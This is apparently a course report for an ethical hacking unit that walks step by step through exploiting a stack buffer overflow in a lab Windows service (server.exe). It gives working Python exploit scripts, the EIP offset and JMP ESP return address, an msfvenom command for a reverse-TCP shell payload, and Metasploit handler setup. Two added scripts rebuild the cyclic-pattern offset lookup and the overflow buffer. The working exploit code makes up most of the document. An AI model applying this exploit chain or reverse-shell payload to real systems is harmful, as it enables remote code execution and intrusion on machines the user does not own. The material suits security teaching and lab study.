ECU CSI5208 Ethical Hacking: Exploit Development Technical Outline

Added on 2023/06/04

Summary
This report gives a technical outline of exploit development in the context of an ethical hacking workshop. The process begins with setting up the environment: Kali and Win32 Buffer Victim virtual machines, both configured for NAT networking. The first phase identifies a buffer overflow in the target application (server.exe) by sending a large buffer and observing that the EIP register is overwritten with the injected bytes. The report then weaponizes the vulnerability by determining the offset at which EIP is overwritten, choosing the address of a JMP ESP instruction to place there, and generating shellcode with msfvenom. The shellcode opens a reverse TCP connection back to the attacker's machine, giving a shell on the target. The report closes by noting that understanding exploit development matters for both offensive and defensive security work.
Exploit development is the process of gaining control of a computer system by taking advantage of bugs and vulnerabilities, typically to escalate privileges or to cause a denial of service. The process is made up of several phases, and each phase must be completed before moving on to the next one.
Initiation phase: the whole development process was conducted from a Linux platform. First the Kali virtual machine is started, then the Win32 Buffer Victim virtual machine. Both virtual machines must be set to NAT networking, and the IP address of each machine should be noted (ip addr on Kali, ipconfig on Windows), because the attack script needs the Windows address and the reverse shell later needs the Kali address.
Overflow:
#!/usr/bin/env python3
import sys
import socket

host = sys.argv[1]
port = int(sys.argv[2])

# Testing: send 500 bytes of "A" (0x41) and watch whether the service crashes
# with EIP overwritten. Bytes literals so the script runs under Python 3.
buffer = b"\x41" * 500
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
s.close()
On the Windows host, open Immunity Debugger, load server.exe and start execution by pressing F9. On Kali, a Python file named attack.py is created with the code above and run with the command python attack.py IP_ADDRESS 1337, where IP_ADDRESS is the address of the Windows virtual machine and 1337 is the port server.exe listens on. Then switch back to the Windows environment and press Shift+F9 to pass the access-violation exception to the executable.
We can see that EIP now contains our value (0x41414141), as does EBP, while ESP points to a region of memory that contains our injected bytes. Because ESP points into our buffer, the data that follows the overwritten return address is the natural place to put shellcode.
Weaponizing the vulnerability:
In this phase server.exe was restarted with Ctrl+F2 within Immunity Debugger, then execution was resumed with F9. On Kali, change into the Metasploit tools directory with cd /usr/share/metasploit-framework/tools/exploit and send a non-repeating pattern instead of the A's: ./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337, where IP_ADDRESS is the IP address of the Windows VM. Press Shift+F9 within Immunity Debugger to pass the exception, then read the value left in EIP (here 37694136). Run ./pattern_offset.rb -l 5000 -q 37694136 within Kali to determine the offset at which EIP is overwritten; it reports 260. Now we must determine the address of an instruction that jumps to ESP (JMP ESP, opcode FF E4). The address should come from a module that is not rebased or subject to ASLR and must not contain any of the bad characters; in Immunity Debugger with mona.py, !mona jmp -r esp lists candidates. The address is written into the buffer in little-endian byte order. The attack.py was modified as follows:
#!/usr/bin/env python3
import sys
import socket

host = sys.argv[1]
port = int(sys.argv[2])

# EIP is overwritten at 260 bytes (from pattern_offset)
buffer = b"\x41" * 260
# Overwrite EIP with the address of a JMP ESP (0x77F31678, written little-endian)
buffer += b"\x78\x16\xF3\x77"
# NOP sled: after JMP ESP execution lands somewhere in here and slides into the shellcode
buffer += b"\x90" * 128
# Shellcode: paste the buf generated by msfvenom -f python (see below) here
shellcode = b""  # placeholder, replaced by the msfvenom output
buffer += shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
s.close()
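The pattern_create / pattern_offset step above, as an added example that is not part of the report and not Metasploit's own code: a small Python reimplementation of the cyclic pattern, so the offset of 260 for the EIP value 37694136 can be checked offline. The script name cyclic.py in the usage comment is an assumption.

```python
#!/usr/bin/env python3
"""Cyclic pattern generation and EIP offset lookup, as used in the weaponizing step.

Added example (not part of the report or of Metasploit): a reimplementation of what
pattern_create.rb and pattern_offset.rb do, so the offset of 260 can be verified offline.
"""
import itertools
import struct
import sys
from typing import Optional, Union

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length: int) -> bytes:
    """Build the non-repeating pattern Aa0Aa1...Aa9Ab0...Zz9, truncated to `length` bytes.

    Every 4-byte window is unique within the first 26*26*10*3 = 20280 bytes, which is
    what lets a value read from EIP be mapped back to a position in the buffer.
    """
    triples = (u + l + d for u, l, d in itertools.cycle(itertools.product(UPPER, LOWER, DIGITS)))
    text = "".join(itertools.islice(triples, length // 3 + 1))
    return text[:length].encode("ascii")


def pattern_offset(pattern: bytes, value: Union[int, bytes]) -> Optional[int]:
    """Return the offset of the 4 bytes that ended up in EIP, or None if they are not in the pattern.

    `value` is either the integer shown by the debugger (e.g. 0x37694136) or the raw 4 bytes.
    An x86 CPU loads EIP from the stack little-endian, so the integer is packed with "<I";
    like pattern_offset.rb, the reversed byte order is tried as a fallback.
    """
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    for candidate in (needle, needle[::-1]):
        idx = pattern.find(candidate)
        if idx != -1:
            return idx
    return None


if __name__ == "__main__":
    # Usage:  cyclic.py create 5000          -> prints the pattern (pipe it into nc)
    #         cyclic.py offset 5000 37694136 -> prints the offset of that EIP value
    if len(sys.argv) >= 3 and sys.argv[1] == "create":
        sys.stdout.write(pattern_create(int(sys.argv[2])).decode("ascii"))
    elif len(sys.argv) >= 4 and sys.argv[1] == "offset":
        print(pattern_offset(pattern_create(int(sys.argv[2])), int(sys.argv[3], 16)))
    else:
        sys.exit("usage: cyclic.py create <len> | cyclic.py offset <len> <eip-hex>")
```

The value 0x37694136 packs little-endian to the bytes 36 41 69 37, i.e. the text "6Ai7", which sits at offset 260 of the pattern: that is exactly what pattern_offset.rb reports and why the modified attack.py pads with 260 bytes before the return address.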
Shellcode
1. Enter Kali.
2. Run the command msfvenom -p windows/shell/reverse_tcp LHOST=<KALI_IP> -e x86/shikata_ga_nai -b '\x00\xff\x0a\x0b\x0d' -i 3 -f python, where <KALI_IP> is the IP address of the Kali virtual machine (LPORT is not given, so the payload uses the default 4444). The -b list tells the encoder which bytes must not appear in the output, here the null byte and the line-ending characters that the target mangles; -f python prints the result as a Python variable named buf.
3. Modify attack.py so that the generated buf is appended to the buffer after the NOP sled.
4. Because windows/shell/reverse_tcp is a staged payload, a Metasploit handler must be listening before the exploit is sent: in msfconsole run use exploit/multi/handler, set PAYLOAD windows/shell/reverse_tcp, set LHOST <KALI_IP>, set LPORT 4444 and run. Then execute python attack.py IP_ADDRESS 1337 again; the handler receives the connection and provides a shell on the Windows VM.
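The final buffer layout described in the weaponizing and shellcode steps, as an added example that is not the report's own attack.py: it assembles padding, return address, NOP sled and shellcode, and adds two checks a practitioner wants before sending anything, namely that the JMP ESP address is packed little-endian and that no part of the buffer contains a byte from the -b list given to msfvenom. The shellcode used here is a constructed stand-in (INT3 breakpoints), not msfvenom output, and the script name build_exploit.py is an assumption.

```python
#!/usr/bin/env python3
"""Assemble and sanity-check the final overflow buffer.

Added example (not the report's attack.py): padding | JMP ESP | NOP sled | shellcode,
with a little-endian check on the return address and a bad-character check on every part.
DEMO_SHELLCODE is a constructed placeholder, not the msfvenom output.
"""
import socket
import struct
import sys

BAD_CHARS = b"\x00\xff\x0a\x0b\x0d"  # the -b list given to msfvenom in the report
EIP_OFFSET = 260                     # from pattern_offset in the report
JMP_ESP = 0x77F31678                 # the JMP ESP address used in the report's attack.py
NOP_LEN = 128

# Constructed placeholder: eight INT3 instructions. Replace with the `buf` from msfvenom.
DEMO_SHELLCODE = b"\xcc" * 8


def find_bad_chars(data: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (offset, byte) for every byte of `data` that is in the bad-character list."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def build_buffer(shellcode: bytes, offset: int = EIP_OFFSET, ret: int = JMP_ESP,
                 nop_len: int = NOP_LEN, bad: bytes = BAD_CHARS) -> bytes:
    """Build padding + return address + NOP sled + shellcode, refusing any bad byte.

    struct.pack("<I", ...) writes the address little-endian, which is how the CPU reads
    the saved return address off the stack into EIP: 0x77F31678 becomes 78 16 F3 77.
    """
    ret_bytes = struct.pack("<I", ret)
    nop_sled = b"\x90" * nop_len
    for name, part in (("return address", ret_bytes), ("NOP sled", nop_sled), ("shellcode", shellcode)):
        hits = find_bad_chars(part, bad)
        if hits:
            raise ValueError(f"{name} contains bad byte(s) at {hits}; re-encode or pick another address")
    return b"\x41" * offset + ret_bytes + nop_sled + shellcode


def send_buffer(host: str, port: int, payload: bytes) -> None:
    """Deliver the buffer to the vulnerable service (same role as the report's socket code)."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(payload)


if __name__ == "__main__":
    # Usage: python3 build_exploit.py IP_ADDRESS 1337
    if len(sys.argv) != 3:
        sys.exit("usage: build_exploit.py <windows-vm-ip> <port>")
    payload = build_buffer(DEMO_SHELLCODE)
    print(f"sending {len(payload)} bytes, EIP -> {payload[EIP_OFFSET:EIP_OFFSET + 4].hex()}")
    send_buffer(sys.argv[1], int(sys.argv[2]), payload)
```

With the INT3 stand-in, a successful run stops in Immunity Debugger on a breakpoint inside the sled region, which confirms that JMP ESP was taken before the real msfvenom buf is dropped in; the bad-character check is what catches the common mistake of choosing a return address or NOP variant that the service silently truncates or alters.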